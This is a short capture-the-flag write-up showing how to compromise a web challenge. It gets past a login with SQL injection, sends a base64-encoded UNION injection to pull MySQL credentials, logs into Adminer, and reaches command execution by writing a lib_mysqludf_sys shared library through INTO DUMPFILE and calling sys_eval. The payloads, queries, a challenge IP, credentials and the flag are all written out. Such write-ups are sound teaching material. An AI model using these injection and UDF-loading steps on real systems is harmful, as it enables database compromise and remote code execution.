I’ll divide this writeup in 2 steps:

  1. this stage will be about how to get access to Adminer panel
  2. this last stage will face how to get RCE in Adminer using MySQL UDF.

Starting from the first step, which was pretty easy and straight-forward, we have to bypass this login: http://178.63.58.69:8086/Th3-D4rk-T4sks/ (you can take the directory from the index HTML comment). Easy sql injection there, just use for both username and password: ’ or ’ : ’ or ’ . Once you logged in you have to face another one but UNION based this time. Just view a task and you’ll notice that ‘id’ GET parameter is base64 encoded. For submit your payload just encode it and send it.

http://178.63.58.69:8086/Th3-D4rk-T4sks/viewtask.php?id=MScpIGFuZCAxPTIgdW5pb24gc2VsZWN0IDEscGFzc3dvcmQsdXNlciBmcm9tIG15c3FsLnVzZXIj

This injection will retrive for us the MySQL credentials for the “dark” user (its password is 123123)

We need its credentials because if you look at robots.txt you’ll notice that there is an interesting page which is D4rk_MySQL.php. Browsing it you can see that it is Adminer. Now for login just use the ones we found previously.

The second stage is about exploiting the fact that we have file_priv setted. Basically for reaching RCE we’re going to write into the mysql plugin directory the https://github.com/mysqludf/lib_mysqludf_sys shared module which will execute for us system commands using the sql shell. For load it just use a query like:

select unhex('hex_encoded_udf_moudel') into dumpfile '/usr/lib/mysql/plugin/rce_now.so';

Doing this we have created our wrapper plugin. Now we just have to load it and then grab the flag:

CREATE FUNCTION sys_eval RETURNS string SONAME 'rce_now.so';

select sys_eval('cat /home/Th3_D@rk_S3cr3t/FL@g_Bala7.txt')

Flag: Th3_Gr3@t_7aMaDa

Razor4x